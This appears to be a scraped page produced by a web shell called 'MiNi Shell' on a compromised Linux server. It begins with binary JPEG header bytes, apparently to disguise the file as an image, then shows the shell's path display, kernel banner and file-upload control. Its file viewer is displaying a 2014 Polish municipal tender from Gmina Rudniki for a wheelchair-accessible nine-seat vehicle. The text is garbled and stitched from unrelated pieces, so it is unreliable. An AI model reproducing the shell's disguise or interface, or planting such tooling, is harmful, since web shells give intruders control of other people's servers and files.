JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20140214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20140214/52706-N-2014.html

<p class="kh_header"><b>Rudniki: Dostawa fabrycznie nowego 9-osobowego samochodu przystosowanego do przewozu osób niepełnosprawnych</b><br>
<b>Numer ogłoszenia: 52706 - 2014; data zamieszczenia: 14.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rudniki , ul. Wojska Polskiego 12, 46-325 Rudniki, woj. opolskie, tel. 034 35-95-072, faks 034 3595013.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rudniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowego 9-osobowego samochodu przystosowanego do przewozu osób niepełnosprawnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa samochodu osobowego przystosowanego do przewozu osób niepełnosprawnych, w tym jedno miejsce do przewozu osoby na wózku inwalidzkim z homologacją 9-cio osobową spełniający m. in. :
1.Parametry podstawowe pojazdu::
1) Samochód osobowy typu mikrobus 9 miejscowy ( 8+1), dodatkowo przystosowany do przewozu jednego rozłożonego wózka inwalidzkiego ( tj. montaż 1 wózka + 7 miejsc siedzących + 1 kierowca), 
2) Fabrycznie nowy, rok produkcji  IV kwartał 2013 lub 2014 ,
3)  Pojemność silnika min. 1900 cm3 i więcej,
4)  Moc silnika min. 100 KM,
5)  Nadwozie przeszklone, szyby przyciemnione,
6) Rodzaj paliwa - olej napędowy,
7) Norma spalin EURO 5,
8). Liczba drzwi 3 + 1 drzwi tylne podgrzewane (w tym drzwi boczne przesuwane z prawej strony pojazdu),
9)  Skrzynia biegów manualna,
10) Napęd przedni,
11)  Minimum 1 okno przesuwne w przestrzeni pasażerskiej,
12)  Siedzenie podwójne obok kierowcy
13)  Dwa rzędy foteli pojedyńczych z regulacją oparcia z pasami 3 pkt ( przy każdym miejscu siedzącym 8+1 mają być trzypunktowe pasy bezpieczeństwa),
14)  Trzeci rząd siedzeń, do szybkiego demontażu co najmniej 1 środkowy fotel,
15)  Wspomaganie układu kierowniczego,
16)  Układ hamulcowy z ABS, elektroniczny korektor siły hamowania EBV, układ stabilizacji toru jazdy ESP,,
17)  Poduszka powietrzna kierowcy i pasażera,
18)  Pirotechniczne napinacze pasów co najmniej kierowcy i dwóch pasażerów z boku
19)   Przyciemniane szyby-m ciemna folia,
20)  Kolor nadwozia do uzgodnienia z zamawiającym przed podpisaniem umowy.

2. Wyposażenie funkcjonalne - minimalny próg wyposażenia:
1).. Klimatyzacja przód i tył z możliwością regulacji ( dodatkowy parownik)
2). Ogrzewanie przestrzeni pasażerskiej,
3)  Elektrycznie opuszczane szyby przednie i regulowane lusterka wsteczne ( po stronie kierowcy sferyczne, po stronie pasażera lusterko o poszerzonym polu widzenia),
4)  Fotel kierowcy z regulacją wysokości, z podłokietnikiem, regulacją przesuwu o i pochylenia oparcia, regulowany zagłówek
5)  Centralny zamek z  zabezpieczeniem sterowanym pilotem,
6)  Autoalarm  honorowany przez firmy ubezpieczeniowe,
7) Radio CD MP3, 6 głośników + sterowanie z kola kierownicy,
8). Zabezpieczenie przed otwarciem od wewnątrz bocznych drzwi przesuwanych oraz drzwi tylnych,
9) Światło halogenowe przeciwmgielne przednie,
10). Gniazdo elektryczne 12 V,
11)  Komputer pokładowy,
12) Czujniki parkowania - tył,.
13 ) Opony letnie z felgami aluminiowymi,
14)  Dodatkowy komplet felg z oponami zimowymi,
15)  Zagłówki przy wszystkich siedzeniach,
16)  Immobiliser,
17) Obrotomierz,
18) .Zamykany schowek,
19) Minimum 2 lampy  oświetleniowe w części pasażerskiej,
20)  Trzecie światło STOP,
21)  Kierunkowskazy w tylnych narożnikach dachu pojazdu,
22) Tapicerowanie nadwozia tapicerką miękką,
23)  Pokrowce założone na wszystkie miejsca siedzące,
24) Szybki demontaż środkowego fotela i wjazd w to miejsce  wózka inwalidzkiego,
25) Szyny osadzone w podłodze przy przystosowane do mocowania szybkozłączy,
26) Atestowane pasy z regulacją do montażu wózka inwalidzkiego w szynach,
27) Pasy zabezpieczające osobę niepełnosprawną na wózku,
28) Podłoga wyłożona  wykładziną antypoślizgową,
29) Najazdy dostarcza zamawiający,
30)  oznakowanie pojazdu zgodnie z przepisami o ruchu drogowym ( nalepki magnetyczne  -niepełnosprawni)
31) Samochód powinien posiadać wyposażenie zgodne z przepisami ustawy prawo o ruchu drogowym oraz posiadać dokumenty dopuszczające do zarejestrowania na terenie RP.

3. Minimalne parametry eksploatacyjne pojazdu:
1). Zużycie paliwa nie więcej niż 7,8 l/100 km - mierzone w cyklu mieszanym,
2) Zużycie energii nie więcej niż 2,8 MJ/km,
3) wartość emisji dwutlenku węgla w cyklu łączonym ( wartość usredniona nie więcej niż 207 g/km,
4) pojazd spełnia normę EURO 5 pod względem emisji tlenków azotu, cząstek stałych oraz węglowodorów,
5) Gwarancja mechaniczna na wszystkie zespoły i podzespoły samochodu bez wyłączeń, obejmującej prawidłowe funkcjonowanie samochodu, wady materiałowe funkcjonowanie samochodu, wady materiałowe i fabryczne, bez limitu kilometrów min. 24 miesiące od momentu podpisania protokołu zdawczo-odbiorczego przedmiotu zamówienia, gwarancja na powłoki lakiernicze  min.  24 miesiące od momentu podpisania protokołu zdawczo-odbiorczego przedmiotu zamówienia, gwarancja dotycząca perforacji podwozia i nadwozia min. 96 miesięcy od momentu podpisania protokołu zdawczo-odbiorczego przedmiotu zamówienia.
6) Dostępność i warunki serwisu gwarancyjnego. Serwis autoryzowany dostępny max. do 100 km  od siedziby zamawiającego. Wykonawca zobowiązany będzie dostarczyć przed zawarciem umowy wykaz Autoryzowanych Stacji Obsługi.  Ponadto Wykonawca  zobowiązany jest do zapewnienia samochodu zastępczego w przypadku naprawy gwarancyjnej przekraczającej okres dwóch dni.


Wartość zużycia paliwa, zużycia energii, emisji dwutlenku węgla i pozostałych zanieczyszczeń winny być podawane zgodnie z wynikami pomiarów przeprowadzonych według procedury ustalonej dla celów badań homologacyjnych.
Zużycie energii oblicza się w MJ/km jako iloczyn uśrednionego zużycia paliwa i wartości energetycznej paliwa określonej w załączniku nr 1 do rozporządzenia prezesa rady ministrów z dnia 10 maja 2011 w sprawie innych niż cena obowiązkowych kryteriów oceny ofert w odniesieniu do niektórych rodzajów zamówień publicznych
 ( Dz. U. z 2011r. Nr 96 poz. 559).  Zgodnie z przywołanym rozporządzeniem wartość energetyczna  oleju napędowego wynosi 36 MJ/l.

 Samochód wykonawca dostarczy na swój koszt do siedziby Zamawiającego tj. Urząd Gminy Rudniki. ul. Wojska Polskiego 12, 46-325 Rudniki
Zamawiający nie dopuszcza składania ofert równoważnych
Zamawiający nie dopuszcza składania ofert wariantowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.11.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia ( załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia ( załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia ( załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia ( załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia ( załącznik nr 4 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty wymagane przez Zamawiającego:
a)		Wypełniony druk  Oferta , stanowiący załącznik nr 1 do niniejszej specyfikacji.

b)	Dokument pełnomocnictwa do reprezentowania podmiotów występujących wspólnie ( konsorcjum, spółka cywilna, itp.) w postępowaniu o udzieleniu zamówienia ( załączyć jeżeli dotyczy)
c)	Parafowany projekt umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku ustawowej zmiany stawki VAT, w zakresie wysokości wynagrodzenia w związku ze zmiana podatku..
Wszelkie zmiany treści umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez obie strony, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rudniki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rudniki
46-325 Rudniki
ul. Wojska Polskiego 12
pokój Nr 2 ( parter)
Cena SIWZ w wersji papierowej 50 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2014 godzina 09:00, miejsce: Urząd Gminy Rudniki
46-325 Rudniki
ul. Wojska Polskiego 12
Sekretariat ( I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com